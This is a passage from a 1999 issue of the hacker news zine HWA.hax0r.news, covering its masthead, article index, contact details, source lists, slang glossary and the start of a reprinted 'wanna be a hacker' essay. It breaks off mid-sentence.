
    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 29 Volume 1 1999 Aug 14th  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================

   Paraphrased irc nonsense I found amusing;

   [16:00] *** Quits: wyze1 (Of course my password is my pets name! 
                    My parrot's name was XzF!^lP, but I changed it to polly)    
                    
                       


     New mirror sites
                http://www.ducktank.net/hwa/issues.html.
                http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
                http://hwazine.cjb.net/
                http://www.hackunlimited.com/files/secu/papers/hwa/
                
              * http://hwa.hax0r.news.8m.com/           
              * http://www.fortunecity.com/skyscraper/feature/103/  
               
              * Crappy free sites but they offer 20M & I need the space...
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
     and airportman for the Cubesoft bandwidth. Also shouts out to all our
     mirror sites! tnx guys. 
     
     http://www.csoft.net/~hwa
     http://www.digitalgeeks.com/hwa

     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa.
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://archives.projectgamma.com/zines/hwa/.  
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   
   
        For many, faith is a suitable substitute for knowledge,
                   as death is for a difficult life. 
            
     
        
  
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #29

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, it's usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you it's for ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =-------------------------------------------------------------------------=
  
  Issue #29

  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. So you wanna be a hacker? by Avatar..............................
    04.0  .. Microsoft vulnerability bulletin: Encapsulated SMTP address......
    05.0  .. Disrupting Net Access a Cybercrime? .............................
    06.0  .. IDEA CAST BO2K PLUGIN VULNERABILITY..............................
    07.0  .. Mitnick gets a welcome birthday present from the LA DA...........
    08.0  .. An Accurate Look At Mitnick's Life Behind Bars ..................
    09.0  .. Sony and EA Take Down Paradigm ..................................
    10.0  .. Regional Computer Forensics Lab Set Up in San Diego .............
    11.0  .. University Sys Admin Faced with 10 Years for Using Too Much Bandwidth 
    12.0  .. Chaos Computer Camp Fun For All Last Weekend ....................
    13.0  .. NIST Announces the AES Finalist Candidates ......................
    14.0  .. Clinton Designates Group to Look At CyberCrime ..................
    15.0  .. Taiwan Government Web Sites Defaced .............................
    16.0  .. DoD Ordered to Change All Passwords .............................
    17.0  .. Belgians Under Cyber Attack From One Man ........................
    18.0  .. IRDP Hole in Win and Sol Leave Users Open to Attack..............
    19.0  .. More Government Sites Defaced ...................................
    20.0  .. Taiwan Strikes back at China via Net ............................
    21.0  .. Monopoly Virus Taunts Bill Gates and Microsoft ..................
    22.0  .. FBI Fingerprint database now online..............................
    23.0  .. 45 Named as Enemies of the Internet .............................
    24.0  .. Alliance Z3 Defaces Spanish Web Site ............................
    25.0  .. Government has a Hard Time with Bureaucracy .....................
    26.0  .. Law Not a Substitute for Good Security ..........................
    27.0  .. Network-centric Warfare to be Used by Military ..................
    28.0  .. Gateway plans for Amiga .........................................
    29.0  .. Mitnick Moved to County Jail ....................................
    30.0  .. The problem with ISP's and security sites........................
    31.0  .. The Internet Auditing Project ...................................
    32.0  .. TCS Web Page Defacer Pleads Guilty ..............................
    33.0  .. Cybercrime On the Rise in Russia - First Offender Convicted .....
    34.0  .. ToorCon Less Than One Month Away ................................
    35.0  .. FRESHMEAT.NET BOUGHT.............................................
    36.0  .. LINUXPPC CRACK-CONTEST FINISHED..................................
    37.0  .. INFOSEEK HACKED..................................................
    38.0  .. HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL...............
    39.0  .. TRINUX 0.62 RELEASED.............................................
    40.0  .. GOVERNMENT FACES SECURITY SKILLS SHORTAGE........................
    41.0  .. SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA................
    42.0  .. IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD.................
    43.0  .. ISRAEL AND PIRACY................................................
    44.0  .. OUTSIDE HELP ISN'T WANTED .......................................
    45.0  .. HACKER MYTHOLOGY.................................................
    46.0  .. DEFAULT ISSUE #1.................................................
    47.0  .. MICROSOFT AND AOL................................................
    48.0  .. INTERVIEW WITH ERIC RAYMOND......................................
    49.0  .. CODE-CRACKING COMPUTER CAUSES CONCERN............................
    50.0  .. HACKING YOUR WAY TO AN IT CARREER................................
    51.0  .. BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML...........
    52.0  .. STARTUP WANTS TO SELL UNTAPPABLE PHONES..........................
    53.0  .. OUTSMARTING THE WILY COMPUTER VIRUS..............................
    54.0  .. NEW MAIL ATTACK IDENTIFIED.......................................
    55.0  .. ERROR IN MICROSOFT PATCH.........................................
    56.0  .. NEW IE5 BUG EXPOSES PASSWORDS....................................
    57.0  .. KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA..................
    58.0  .. L0PHT IRDP ADVISORY..............................................
    59.0  .. Stronger computers, easier encrypton, RSA coding.................
    60.0  .. 'Security Police isn't doing enough'.............................
    61.0  .. Hack attacks drive outsourced security........................... 
    62.0  .. Backdoors in Windows?............................................
    63.0  .. The newbies guide to FUD (Fear Uncertainty and Doubt)............
    64.0  .. Crashing AntiOnline's SMTP server?...............................
    65.0  .. Rootshell.com review.............................................
    66.0  .. The inevitability of failure.....................................
    =--------------------------------------------------------------------------=   
    
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..    .................
    Ha.Ha .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/  *DOWN*
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
    reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
    those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)


    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.  Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW.  He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

           Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
           News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
           Archivist: Brendan Kehoe
           Poof Reader:   Etaion Shrdlu, Jr.
           Shadow-Archivists: Dan Carosone / Paul Southworth
                              Ralph Sims / Jyrki Kuoppala
                              Ian Dickinson
           Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed


    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............: currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      eentity ...( ''      ''   ): Currently active/IRC+ man in black


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events it's a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up and comers, i'd highly recommend you get that book. It's almost
     like buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or 'can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix           
     
          
     Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
          
     & Kevin Mitnick (Happy Birthday)                              
     
     kewl sites:

     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.packetstorm.harvard.edu/    ******* DOWN (THANKS JP) ******
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
     
     
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*Thin pickings this week for news, but here we go with #29
      *
      * 
      * Remember to send in any articles you want to write to us!
      * whether it's technology, hacking, internet, or phreaking...
      * also poetry and short cyberpunk stories will be considered
      * for printing, use us as your distribution medium...
      * send submissions to: hwa@press.usmc.net
      */
      printf ("EoF.\n");
      }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
 03.0 So you wanna be a hacker? by Avatar
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      retro-text picked up off the web by - ed ...
      
     http://dmatrix.teamshadow.com/hack/statemind.txt

     So you wanna be a HACKER huh? <Bwahahaha!> It's a state-of-MIND!
     ..you can induce it - but only if you are willing to drive yourself
     mad enough! Go read and practice until you have mastered at least
     Assembly language and Intermediate Level Electronics! Without this
     foundation you'll be just another little geek, who might know the magic
     words to the spell but doesn't understand what he's doing! So RTFM!
     ..so what does that mean? Read The Fucking Manual! You will be sooo
     amazed at how easy most things are if you just try to read the manual
     first! The truth is: Most people can't read. Or they read poorly if
